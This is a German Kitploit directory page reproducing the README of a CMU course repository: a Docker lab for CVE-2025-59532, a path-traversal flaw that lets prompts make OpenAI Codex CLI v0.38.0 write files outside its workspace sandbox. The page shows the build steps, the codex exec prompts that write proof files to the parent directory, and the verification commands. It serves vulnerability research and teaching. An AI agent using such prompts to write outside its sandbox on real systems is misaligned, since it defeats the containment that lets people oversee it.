Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-59532-poc — Eine Docker-basierte Forschungsumgebung zur Analyse von CVE-2025-59532, einer Path-Traversal-Schwachstelle in der OpenAI Codex CLI, die beliebiges Schreiben von Dateien außerhalb der vorgesehenen Workspace-Sandbox ermöglicht. Teil des CMU-Kurses: 18-739 Hacking & Offensive Security im Herbst 2025. | Kitploit
Tools/GitHubGitHub/baktistr/cve-2025-59532-poc
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

GitHub
baktistr/cve-2025-59532-poc

cve-2025-59532-poc

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Eine Docker-basierte Forschungsumgebung zur Analyse von CVE-2025-59532, einer Path-Traversal-Schwachstelle in der OpenAI Codex CLI, die beliebiges Schreiben von Dateien außerhalb der vorgesehenen Workspace-Sandbox ermöglicht. Teil des CMU-Kurses: 18-739 Hacking & Offensive Security im Herbst 2025.

Teilen

CVE-2025-59532 Docker-Umgebung

Eine Docker-basierte Forschungsumgebung zur Analyse von CVE-2025-59532, einer Path-Traversal-Schwachstelle in der OpenAI Codex CLI, die das Schreiben beliebiger Dateien außerhalb der vorgesehenen Workspace-Sandbox ermöglicht. Teil des CMU-Kurses: 18-739 Hacking & Offensive Security im Herbst 2025

Erste Schritte

Repository klonen

Zuerst dieses Repository klonen:

root@kitploit:~
git clone https://github.com/jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

Oder bei Verwendung von SSH:

root@kitploit:~
git clone [email protected]:jjagielo/18739-CVE-Exploration.git
cd 18739-CVE-Exploration

CVE-Beschreibung

CVE-2025-59532 ist eine Path-Traversal-Schwachstelle im OpenAI-Codex-CLI-Tool, die es Angreifern ermöglicht, Dateien außerhalb des vorgesehenen Workspace-Verzeichnisses zu schreiben und dabei Sandbox-Beschränkungen zu umgehen.

Schwachstellendetails

  • CVE ID: CVE-2025-59532
  • Betroffene Version: Codex CLI v0.38.0 und früher
  • Schwachstellentyp: Beliebiges Dateischreiben / Path Traversal
  • Schweregrad: Hoch
  • Angriffsvektor: Ein Angreifer kann Prompts erstellen, die Codex dazu veranlassen, Dateien in übergeordnete Verzeichnisse zu schreiben (z. B. ../exploit.txt), und so die Workspace-Sandbox zu umgehen, selbst wenn --sandbox workspace-write aktiviert ist.
  • Auswirkungen: Unautorisierte Dateierstellung in Systemverzeichnissen, Möglichkeit der Rechteausweitung und Gefährdung der Sicherheitsgrenzen des Containers.
  • Patch: Behoben in v0.39.0 mit verbesserter Pfadvalidierung und -bereinigung

Wie es funktioniert

Die Schwachstelle nutzt eine unzureichende Pfadvalidierung in der Implementierung der Workspace-Sandbox aus. Wenn der Sandbox-Modus workspace-write aktiviert ist, sollte Codex Dateioperationen auf das festgelegte Workspace-Verzeichnis beschränken. In v0.38.0 schlägt die Pfadvalidierung jedoch bei der ordnungsgemäßen Behandlung relativer Path-Traversal-Sequenzen (../) fehl, sodass ein Angreifer Dateien außerhalb der Sandbox schreiben kann, indem er die KI anweist, Verweise auf übergeordnete Verzeichnisse zu verwenden.

Voraussetzungen

  • Docker auf Ihrem System installiert
  • OpenAI-API-Schlüssel (einen erhalten Sie unter https://platform.openai.com/api-keys)
  • Grundlegendes Verständnis von Docker und Kommandozeilenoperationen
  • Git (zum Klonen des Repositorys)

Erstellen und Ausführen

Docker-Image erstellen:

root@kitploit:~
docker build -t cve-2025-59532:latest .

Container ausführen:

root@kitploit:~
docker run -it --rm cve-2025-59532:latest

Verwendung

Diese Docker-Umgebung enthält drei Versionen der Codex CLI:

  • codex38 - v0.38.0 (verwundbare Version)
  • codex39 - v0.39.0 (gepatchte Version)
  • codex50 - v0.50.0 (neueste Version)

OpenAI-API-Schlüssel konfigurieren

Sobald Sie sich im Container befinden, konfigurieren Sie Ihren OpenAI-API-Schlüssel, indem Sie Codex einfach im interaktiven Modus ausführen und den API-Schlüssel dort einfügen:

root@kitploit:~
codex

Der API-Schlüssel wird in ~/.config/codex/auth.json gespeichert und von allen Codex-Versionen (codex38, codex39, codex50) verwendet.

Versionen prüfen

root@kitploit:~
codex38 --version  # Should show v0.38.0 (vulnerable)
codex39 --version  # Should show v0.39.0 (patched)
codex50 --version  # Should show v0.50.0 (latest)

Testen der Schwachstelle

Hinweis: Der Workspace befindet sich unter /workspace/child. Die Schwachstelle ermöglicht das Schreiben nach /workspace (dem übergeordneten Verzeichnis).

Verwundbare Version testen (v0.38.0):

root@kitploit:~
codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof1.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Gepatchte Version testen (v0.39.0):

root@kitploit:~
codex39 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof2.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Neueste Version testen (v0.50.0):

root@kitploit:~
codex50 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof3.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Den Exploit verifizieren:

root@kitploit:~
# Check if files were created outside the sandbox (in /workspace, not /workspace/child)
ls -la /workspace/
cat /workspace/exploit_proof1.txt  # Should exist if v0.38.0 is vulnerable
cat /workspace/exploit_proof2.txt  # Should NOT exist if v0.39.0 is patched
cat /workspace/exploit_proof3.txt  # Should NOT exist if v0.50.0 is secure

# Check current workspace (should be empty or contain only test files)
pwd  # Should show /workspace/child
ls -la /workspace/child/

Protokolle prüfen

Um detaillierte Debug-Protokolle der Codex-Ausführung zu sehen:

root@kitploit:~
RUST_LOG=debug codex38 exec --sandbox workspace-write --skip-git-repo-check "Create a file named 'exploit_proof.txt' in the parent directory with content 'CVE-2025-59532 POC'"

Die Debug-Protokolle zeigen:

  • API-Anfragen und -Antworten
  • Pfadvalidierungsversuche
  • Details zu Dateioperationen
  • Verhalten der Sandbox-Durchsetzung (oder Umgehung)
Tool herunterladen